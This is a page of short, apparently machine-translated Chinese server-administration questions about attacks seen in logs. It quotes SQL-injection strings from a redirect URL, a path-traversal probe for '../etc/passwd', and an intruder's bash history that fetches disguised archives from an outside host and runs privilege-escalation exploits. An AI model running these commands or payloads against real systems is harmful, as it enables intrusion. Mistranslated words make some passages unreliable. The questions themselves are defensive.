我有一个运行在Apache上的Linux网站。 我可以在访问日志文件中看到几个IP地址试图访问一些常见的和众所周知的应用程序,如PhpMyAdmin,如果发现可能会破解服务器。 当然,我没有公开提供phpmyadmin,但我想知道如何防范这种攻击。 也许有一个Linux下的工具,能够检测到这一点,并自动阻止IP地址? 也许另一个工具可以发送邮件时自动检测到。 那是什么艺术? 感谢您的帮助。
我的Windows Server 2003虚拟服务器上的子目录很奇怪(例如:“88ÿÿÿþþþ13þ”)正在创build空白目录。 看起来他们正在上传盗版DVD和盗版软件。 我所有的带宽和文件空间都被吃光了。 这可能是一个共享的权限问题? 我应该在哪里寻求进一步调查呢? 我正在访问的目录的安全权限如下所示:pipe理员 – 所有授权的IIS_WPG – 读取和执行,列出文件夹内容,读取Internet访客 – 拒绝系统 – 所有授权用户 – 读取和执行,列出文件夹内容,读取 我的事件查看器显示许多login/注销没有IP?
我注意到这些线在我的apache日志 [Fri Oct 15 21:09:43 2010] [error] [client 216.205.76.228] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:) 来自以下IP地址: 184.73.216.225 208.109.154.93 216.205.76.228 74.86.23.51 错误信息是什么意思,这些人试图做什么?
可能重复: 我的服务器被黑了应急 我通过Rackspace Cloud Server在Ubuntu上运行了几个站点。 我的网站通常每天使用约3 GB的出站带宽。 今天,我震惊地发现,在过去的一周里,我的服务器每天logging了2TB的出站带宽。 这显然是完全不正常的,并且耗费我一只arm和一条腿。 有趣的是,awstats显示我的网站已经使用了典型的带宽量,所以这是导致这个荒谬的高峰的其他事情。 我怀疑我的网站已被黑客入侵。 我跑了根检查,通过我的服务器日志,并没有发现任何可疑的。 你们有什么想法,我能做些什么来弄清楚这一点?
我是一家公司的pipe理人员,老板似乎认为向所有用户提供本地pipe理员权利是一个好主意……我不能赢,直到我拿到他的工作。 我们有一些用户将防火墙设置为禁用所有连接。 如何在不知情的情况下远程重新configuration这些防火墙? 失败的尝试在下面! S:> net use \ 192.168.1.71 \ IPC $“password”/ user:domain \ username命令成功完成。 S:\ pstools> sc \ 192.168.1.71暂停“Windows防火墙/ Internet连接共享(ICS)”[SC] OpenSCManager失败1722: RPC服务器不可用。 S:\ pstools> telnet \ 192.168.1.71 135连接到\ 192.168.1.71 …无法在端口13上打开与主机的连接5:连接失败 S:\ pstools> psservice \ 192.168.1.71 -u域\用户名-p密码停止“Windows防火墙/ Internet连接共享(ICS)” PsService v2.21 – 服务信息和configuration工具Copyright(C)2001-2006 Mark Russinovich Sysinternals – www.sysinternals.com 无法访问\ 192.168.1.71上的服务控制pipe理器:RPC服务器不可用。 当然,我可以开车抓住机器,做一些事情让我开火,让事情正确完成,但我正在寻找一个更简单的方法来完成这件事。
我在云提供商上创build了一个实例。 生成.pem键通过sshlogin。 安装mysql-server,下载服务器上的.sql备份。 从我的本地计算机中删除了.sql备份,并且错误地删除了通过SSH连接到mysql服务器所需的.pem密钥。 问题:如何取回.sql备份文件? 我知道关于mysql转储,但我不知道它是否可以从服务器本身加载文件,而无需通过该服务器上的ssh实际login。 我知道它在/home/back.sql,但我不能通过SSH连接到服务器。 是否有可能把它弄回来或是永远失去 在MySQL服务器上,我有“根”的访问,但我认为MySQL的应用程序/服务器安装为“MySQL”用户不是“根,所以我不知道如果/我怎么能砍掉它。通过百胜延续版本)。
在过去的一周里,我的stream量日志显示了来自世界各地30多个不同IP地址的URL(通常是重复尝试)。 这不是一个url,应该获得超过一个命中,它应该只能通过链接访问一个页面,其中包含rel =“nofollow”。 该url调用一个PHP的唯一目的是redirect到其他网站基于id=查询参数。 该网页的url是 mywebsite.com/linkredirect.php?id=434&site=www.creative-science.org.uk 上面的链接也以其他forms出现在日志中: /linkredirect.php?site=www.ausetute.com.au&id=266%25%27/**/aND/**/%278%25%27%3D%273 .. there were about 50 different iterations of this – which is attempting sql injection – but I can't figure out the purpose of it. /linkredirect.php?id=434&site=www.premieresurgical.com … this is an invalid link – the id=434 is valid but the "site=" query is invalid 我参与项目蜜jar,一些请求是可疑和评论垃圾邮件 用户代理似乎总是: Mozilla/5.0 (Macintosh; […]
我看着netstat,我注意到除了我以外的人通过SSH连接到服务器。 我照顾这个,因为我的用户只有一个SSH访问。 我发现这在一个FTP用户.bash_history文件: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010×64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat […]
对不起,如果这是一个总的新手问题,但我正在做一个激进的政治组织的前端devise工作,所有我的Linux的安装,无论是openSUSE,Ubuntu或Fedora不断变砖或只是通常在最恼人的方法。 我知道这个问题可能有很多方面,我根本不是一个系统pipe理员,但是我只是希望能够帮助解决他们的前端devise工作,而无需一直处理黑客。 那么,我是否应该采取一些基本的预防措施来阻止这种事情的发生? 这不像我甚至运行一个开放的服务器,除了我没有能够通过Skype连接到任何人没有被静态攻击,Windows似乎设法至less保持活着超过10分钟,而不会完全疯狂和/或变得模糊。 所以,我的问题是:在build立一个客户端作为本地主机服务器时,最基本的规定是什么?要阻止人们访问它来阻止我做我正在做的政治工作。 如果有人谈论SSH密钥或closures端口,我可能会一直尖叫,直到每个人都停下来,然后消失。 非常感谢你!
目前我正在使用Blockhosts和mod_evasive来“pipe理”次要攻击和虚假请求,我想知道是否有更好的/更有效的东西。 一些行为像mod_evasive,监视请求,因为他们进来,但有能力控制什么被阻止使用关键字或正则expression式。 例如,任何时候任何人请求“../etc/passwd”之类的东西 – 我想放弃这个IP地址几天。 我也看过了fail2ban,但它和blockhosts一样,监视日志文件。 不是我正在寻找的东西。 无论如何,服务器是运行Apache 2.2的CentOS,在虚拟主机容器中容纳大约100个站点,所以我只能通过Web访问虚拟机主机服务器防火墙并试图在每个域的htaccess重写规则中堵塞将不可维护。 有什么build议么?